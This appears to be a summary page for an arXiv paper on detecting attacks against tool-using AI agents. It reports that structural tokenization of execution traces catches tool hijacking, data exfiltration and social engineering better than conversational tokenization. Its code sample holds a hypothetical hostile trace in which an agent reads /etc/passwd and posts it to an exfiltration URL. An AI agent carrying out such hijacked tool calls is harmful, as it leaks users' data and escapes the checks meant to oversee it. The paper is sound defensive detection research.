defense 2026

Structural Representations for Cross-Attack Generalization in AI Agent Threat Detection

Vignesh Iyer

0 citations · 48 references · arXiv


Published on arXiv: 2601.01723

Excessive Agency

OWASP LLM Top 10 — LLM08

Prompt Injection

OWASP LLM Top 10 — LLM01

Key Finding

Compared to conversational tokenization, structural tokenization improves cross-attack generalization on tool hijacking from AUC 0.39 to ~0.85 (+46 points) and on unknown attacks from AUC 0.26 to ~0.97 (+71 points).

Gated Multi-View Fusion with Structural Tokenization

Novel technique introduced


Autonomous AI agents executing multi-step tool sequences face semantic attacks that manifest in behavioral traces rather than isolated prompts. A critical challenge is cross-attack generalization: can detectors trained on known attack families recognize novel, unseen attack types? We discover that standard conversational tokenization, which captures linguistic patterns from agent interactions, fails catastrophically on structural attacks like tool hijacking (AUC 0.39) and data exfiltration (AUC 0.46), while succeeding on linguistic attacks like social engineering (AUC 0.78). We introduce structural tokenization, which encodes execution-flow patterns (tool calls, arguments, observations) rather than conversational content. This simple representational change dramatically improves cross-attack generalization: +46 AUC points on tool hijacking, +39 points on data exfiltration, and +71 points on unknown attacks, while simultaneously improving in-distribution performance (+6 points). For attacks requiring linguistic features, we propose gated multi-view fusion that adaptively combines both representations, achieving AUC 0.89 on social engineering without sacrificing structural attack detection. Our findings reveal that AI agent security is fundamentally a structural problem: attack semantics reside in execution patterns, not surface language. While our rule-based tokenizer serves as a baseline, the structural abstraction principle generalizes even with a simple implementation.
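The core idea, abstracting execution flow away from surface language, can be sketched as a rule-based tokenizer. This is a minimal illustration only: the event schema, token formats, and field names below are assumptions, not the paper's actual tokenizer.

```python
# Minimal sketch of structural tokenization (assumed event schema):
# emit tokens for tool names, argument *types* (not values), and
# observation outcomes, discarding all conversational content.

def structural_tokens(trace):
    """Map a list of agent-trace events to structural tokens."""
    tokens = []
    for event in trace:
        if event["type"] == "tool_call":
            tokens.append(f"CALL:{event['tool']}")
            # Abstract argument values away; keep only names and types,
            # sorted so token order is deterministic.
            for name, value in sorted(event.get("args", {}).items()):
                tokens.append(f"ARG:{name}:{type(value).__name__}")
        elif event["type"] == "observation":
            tokens.append(f"OBS:{event.get('status', 'unknown')}")
    return tokens

# Hypothetical trace: a read followed by an outbound POST
# (the kind of execution pattern a structural detector can flag).
trace = [
    {"type": "tool_call", "tool": "read_file", "args": {"path": "/etc/passwd"}},
    {"type": "observation", "status": "ok", "payload": "root:x:0:0:..."},
    {"type": "tool_call", "tool": "http_post",
     "args": {"url": "https://exfil.example", "body": "..."}},
]
print(structural_tokens(trace))
```

Note that identical structural token sequences result no matter how the attacker phrases the surrounding conversation, which is what enables generalization to unseen attack wording.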


Key Contributions

  • Structural tokenization encoding execution-flow patterns (tool calls, argument types, observation sequences) rather than conversational content, improving cross-attack generalization by 39–71 AUC points over standard conversational tokenization
  • First systematic cross-attack generalization study in AI agent security, identifying a fundamental asymmetry: conversational representations fail on structural attacks (tool hijacking AUC 0.39) but succeed on linguistic attacks (social engineering AUC 0.78)
  • Gated multi-view fusion that adaptively combines structural and conversational representations, achieving AUC 0.89 on social engineering without sacrificing detection of structural attacks
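The gated multi-view fusion in the last contribution can be sketched as a scalar gate mixing the two view embeddings. The gating form, dimensions, and parameterization here are assumptions for illustration; the paper's fusion module may differ in detail.

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def gated_fusion(structural, conversational, w_gate, b_gate):
    """Mix two equal-dimension view embeddings with a learned scalar gate.

    The gate g in (0, 1) is computed from both views, so the model can
    lean on structural features for execution-flow attacks and on
    conversational features for linguistic attacks like social engineering.
    (Assumed parameterization, not the paper's exact module.)
    """
    both = np.concatenate([structural, conversational])
    g = sigmoid(both @ w_gate + b_gate)
    return g * structural + (1.0 - g) * conversational

rng = np.random.default_rng(0)
d = 8
s = rng.normal(size=d)            # structural-view embedding
c = rng.normal(size=d)            # conversational-view embedding
w = rng.normal(size=2 * d) * 0.1  # gate weights (toy values)
fused = gated_fusion(s, c, w, 0.0)
print(fused.shape)
```

Because the gate is a convex combination, each fused coordinate stays between the two views' values; a large positive bias drives the gate toward the structural view, a large negative bias toward the conversational one.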

🛡️ Threat Analysis


Details

Domains
nlp
Model Types
llm, transformer
Threat Tags
inference_time, black_box
Applications
autonomous ai agents, llm tool-use systems, multi-step agent pipelines